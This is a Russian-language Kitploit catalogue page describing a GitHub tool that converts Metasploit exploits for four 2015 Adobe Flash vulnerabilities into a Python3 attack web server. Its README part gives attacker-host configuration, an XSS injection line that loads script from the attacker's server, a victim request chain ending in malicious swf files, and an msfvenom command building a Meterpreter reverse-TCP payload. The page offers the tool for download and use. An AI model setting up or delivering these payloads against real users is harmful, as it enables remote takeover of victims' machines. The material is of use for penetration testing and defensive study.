Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Adobe-Flash-Exploits_17-18 — Конвертированные эксплойты Metasploit для уязвимостей Adobe Flash CVE-2015-3090, CVE-2015-3105, CVE-2015-5119 и CVE-2015-5122 в скрипт Python3. | Kitploit
Инструменты/GitHubGitHub/xattam1/adobe-flash-exploits_17-18
Фреймворки для эксплойтовГенерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubxattam1/adobe-flash-exploits_17-18

Adobe-Flash-Exploits_17-18

Конвертированные эксплойты Metasploit для уязвимостей Adobe Flash CVE-2015-3090, CVE-2015-3105, CVE-2015-5119 и CVE-2015-5122 в скрипт Python3.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
14 лет назадЕщё не проверено

Эксплойты Adobe Flash CVE-2015-3090, CVE-2015-3105, CVE-2015-5119 и CVE-2015-5122 — скрипт Python3

Конвертированные эксплойты Metasploit для уязвимостей Adobe Flash CVE-2015-3090, CVE-2015-3105, CVE-2015-5119 и CVE-2015-5122 в скрипт Python3.

Информация

Этот скрипт запускает веб-сервер, который может эксплуатировать одну из следующих уязвимостей Adobe Flash за раз:

  1. CVE-2015-3090
  2. CVE-2015-3105
  3. CVE-2015-5119
  4. CVE-2015-5122

Выполнение

Вы должны внести изменения (описано здесь) в exploit.py в соответствии с вашими потребностями.

Изменения

  • hostname = "192.168.1.100"
    • Это IP-адрес атакующей системы, на которой будет размещён веб-сервер эксплойта.
  • serverPort = 8080
    • Это порт на атакующей системе, на которой будет размещён веб-сервер эксплойта.
  • xss = False
    • Если установлено значение True, то первый запрос жертвы к серверу обрабатывается как JavaScript:
      • Пример XSS-инъекции:
        • <script src="http://192.168.1.100:8080/"></script>
      • Вектор атаки:
        • Запрос жертвы 1 -> сервер, уязвимый к XSS:
          • Жертва открывает XSS-инъекцию на удалённом сервере, который запрашивает JavaScript-файл (см. запрос 2).
        • Запрос жертвы 2 -> источник JavaScript на атакующей системе.
        • Запрос жертвы 3 -> вредоносный swf-файл.
    • Если установлено значение False, то первый запрос жертвы к серверу обрабатывается как HTML:
      • Пример:
        • http://192.168.1.100:8080/
      • Вектор атаки:
        • Запрос жертвы 1 -> HTML-файл на атакующей системе.
        • Запрос жертвы 2 -> вредоносный swf-файл.
  • base64Payload = "..."
    • Это base64-нагрузка, которая будет выполнена на системе жертвы.
    • Измените приведённый ниже пример команды под свои нужды и сгенерируйте нагрузку:
      • Пример:
        • msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 | base64
      • Примечание: Единственная нагрузка, которая у меня работала, — это windows/meterpreter/reverse_tcp.

  • swfFile = swfFileList['37368']
    • Выберите swf-файл эксплойта Adobe Flash для эксплуатации системы жертвы:
      • root@kitploit:~
        swfFileList = {
            '37368': 'CVE-2015-3090.swf',
            '37448': 'CVE-2015-3105.swf',
            '37523': 'CVE-2015-5119.swf',
            '37599': 'CVE-2015-5122.swf'
        }
        

Запуск

Выполните следующую команду в том же каталоге, где находятся вредоносные swf-файлы, чтобы запустить скрипт эксплойта Adobe Flash:

  • python3 exploit.py

Ссылки:

CVE-2015-3090 -> https://exploit-db.com/exploits/37368

CVE-2015-3105 -> https://exploit-db.com/exploits/37448

CVE-2015-5119 -> https://exploit-db.com/exploits/37523

CVE-2015-5122 -> https://exploit-db.com/exploits/37599

Скачать инструмент